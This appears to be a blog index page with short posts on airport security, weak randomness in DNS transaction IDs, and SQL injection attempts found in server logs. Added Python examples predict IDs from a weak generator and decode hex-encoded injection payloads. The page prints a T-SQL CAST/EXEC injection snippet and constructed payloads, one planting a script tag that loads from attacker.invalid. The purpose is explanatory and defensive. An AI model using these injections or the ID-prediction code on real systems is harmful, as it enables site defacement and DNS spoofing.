Andre's Blog
Perfection is when there is nothing left to take away
Airline Security Theater

I recently visited Newfoundland for a few days and traveled to Elliston, which is famous for its puffin viewing site and root cellars. One of the information signs next to a group of root cellars described how the people of Elliston harvested partridge berries in the past and, inspired by this story, I bought a couple of jars of partridge berry jam at Nanny's Root Cellar Kitchen as a small present for my friends back in Ontario.

When I was leaving Newfoundland, I didn't want to put glass jars in the checked baggage and took them into the cabin with me instead, without the slightest thought that a couple of jars of jam could present any trouble at the airport. How wrong I was.

Random security

Generating good random values is critical for the security of applications that use them, and far more critical than many developers realize, as was highlighted by the recent flurry of DNS servers reported vulnerable to various forms of attack based on the predictability of their transaction identifiers.
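The attack this paragraph alludes to, as an added example that is not part of the original post: a constructed resolver draws 16-bit DNS transaction IDs from the top half of a 32-bit linear congruential generator (the multiplier and increment are glibc's rand() constants, used here only for illustration), and an off-path attacker who has observed three IDs brute-forces the 16 hidden state bits and predicts the fourth. The CSPRNG-backed generator built on Python's secrets module is the fix. All class and function names are this example's own.

```python
"""Predicting DNS transaction IDs drawn from a weak PRNG versus a CSPRNG.

Added example, not code from the original post. WeakTxidGenerator is a
constructed, deliberately weak 32-bit LCG that hands out the upper 16 bits
of its state as a transaction ID; the attacker is an off-path spoofer who
has seen a few IDs and wants to guess the next one.
"""
import secrets

LCG_A = 1103515245      # glibc rand() constants, for illustration only
LCG_C = 12345
MASK32 = 0xFFFFFFFF


def _step(state: int) -> int:
    """One LCG iteration modulo 2**32."""
    return (LCG_A * state + LCG_C) & MASK32


class WeakTxidGenerator:
    """Weak: each 16-bit ID is the top half of the 32-bit LCG state (constructed)."""

    def __init__(self, seed: int) -> None:
        self.state = seed & MASK32

    def next_id(self) -> int:
        self.state = _step(self.state)
        return self.state >> 16


class StrongTxidGenerator:
    """Strong: every ID is drawn independently from the OS CSPRNG."""

    def next_id(self) -> int:
        return secrets.randbelow(1 << 16)


def predict_next_weak_id(observed: list[int]) -> set[int]:
    """Recover the hidden LCG state from observed IDs and predict the next one.

    The first observed ID reveals the top 16 bits of the state that produced
    it; the bottom 16 bits are brute-forced (2**16 candidates) and each
    candidate is checked against the remaining observations. Returns the set
    of next IDs consistent with everything seen (normally a single value).
    """
    if len(observed) < 2:
        raise ValueError("need at least two observed IDs")
    first, rest = observed[0], observed[1:]
    predictions: set[int] = set()
    for low in range(1 << 16):
        state = (first << 16) | low
        consistent = True
        for expected in rest:
            state = _step(state)
            if (state >> 16) != expected:
                consistent = False
                break
        if consistent:
            predictions.add(_step(state) >> 16)
    return predictions


def demo(seed: int = 0xDEADBEEF) -> tuple[int, set[int]]:
    """Observe three weak IDs, predict the fourth, return (actual, predicted)."""
    gen = WeakTxidGenerator(seed)
    seen = [gen.next_id() for _ in range(3)]
    predicted = predict_next_weak_id(seen)
    actual = gen.next_id()
    return actual, predicted


if __name__ == "__main__":
    actual, predicted = demo()
    print(f"weak generator: attacker predicts {sorted(predicted)}, actual {actual}")
    strong = StrongTxidGenerator()
    print("strong generator sample:", [strong.next_id() for _ in range(3)])
```

The same state-recovery loop run against StrongTxidGenerator yields nothing useful: its outputs share no hidden state, so a "consistent" candidate is a coincidence with probability about 2**-16 per extra observation, and the spoofer is back to guessing all 65536 IDs.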

Massive SQL injection, anyone?

Last weekend I found a number of entries in the HTTP server logs indicating SQL injection attempts. The SQL targeted MS SQL Server and used the CAST function to decode a long hexadecimal sequence, which bypasses quote-escaping code on the server side because the encoded payload contains no quote characters at all.

DECLARE @S VARCHAR(4000);
SET @S=CAST(0x4445434C4152452040542...736F7220 AS VARCHAR(4000));
EXEC(@S);
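A scanner for the kind of log entries described above, as an added example that is not code from the original post. It runs over constructed Apache-style log lines (the payloads, addresses and timestamps are made up), URL-decodes each request, finds CAST(0x... AS VARCHAR/NVARCHAR) literals and decodes them the way SQL Server would, so the analyst sees the SQL the attacker wanted EXEC() to run rather than a wall of hex. The NVARCHAR case is the caveat worth remembering: that literal is UTF-16LE, and a scanner that only does 8-bit decoding shows garbage for it.

```python
"""Decoding hex-encoded T-SQL injection payloads found in web server logs.

Added example, not code from the original post. SAMPLE_LOG is constructed:
the payloads, client addresses and timestamps are invented. The injection
shape is the one the post describes: CAST(0x<hex> AS VARCHAR(n)) + EXEC(),
chosen by attackers because the request then contains no quote characters.
"""
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS [N]VARCHAR(n)) or [N]CHAR(n); group 2 is "N" for Unicode.
CAST_HEX_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\s*\(\s*\d+\s*\)",
    re.IGNORECASE,
)
# Request target from an Apache combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"')

# Constructed payloads used to build the sample log below.
INJECTED_SQL = ("UPDATE comments SET body = body + "
                "'<script src=\"http://attacker.invalid/a.js\"></script>'")
RECON_SQL = "SELECT name FROM sysobjects WHERE xtype = 'U'"


def _varchar_hex(sql: str) -> str:
    return "0x" + sql.encode("latin-1").hex().upper()


def _nvarchar_hex(sql: str) -> str:
    return "0x" + sql.encode("utf-16-le").hex().upper()


SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2008:03:12:44 +0000] "GET /news.asp?id=42;DECLARE%20@S%20'
    'VARCHAR(4000);SET%20@S=CAST(' + _varchar_hex(INJECTED_SQL) +
    '%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [01/Jan/2008:03:13:01 +0000] "GET /news.asp?id=43 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2008:03:14:09 +0000] "GET /news.asp?id=42;DECLARE%20@S%20'
    'NVARCHAR(4000);SET%20@S=CAST(' + _nvarchar_hex(RECON_SQL) +
    '%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 500 312 "-" "Mozilla/4.0"',
]


def decode_cast_hex(hex_digits: str, is_nvarchar: bool) -> str:
    """Decode the literal as SQL Server interprets it.

    NVARCHAR is UTF-16LE; VARCHAR is a single-byte code page (latin-1 is a
    close enough stand-in here). An odd-length literal is treated as if it
    were zero-padded on the left, which is how SQL Server reads 0x123.
    """
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits
    raw = bytes.fromhex(hex_digits)
    return raw.decode("utf-16-le" if is_nvarchar else "latin-1", errors="replace")


def scan_log_line(line: str) -> list[dict]:
    """Return one finding per CAST(0x...) literal in the request, with decoded SQL."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Decode twice: double URL-encoding is a common trick against naive filters.
    decoded = unquote_plus(unquote_plus(m.group(1)))
    findings = []
    for hit in CAST_HEX_RE.finditer(decoded):
        findings.append({
            "client": line.split(" ", 1)[0],
            "payload": decode_cast_hex(hit.group(1), bool(hit.group(2))),
            "unicode": bool(hit.group(2)),
        })
    return findings


def scan_log(lines: list[str]) -> list[dict]:
    """Scan every line and collect the findings in log order."""
    return [f for line in lines for f in scan_log_line(line)]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        kind = "NVARCHAR" if finding["unicode"] else "VARCHAR"
        print(f"{finding['client']} ({kind}): {finding['payload']}")
```

Decoding the payload is for triage only; the fix on the application side is the same whether the attacker hex-encodes or not: build the query with bound parameters so that request data is never concatenated into SQL text, and quote-escaping becomes irrelevant.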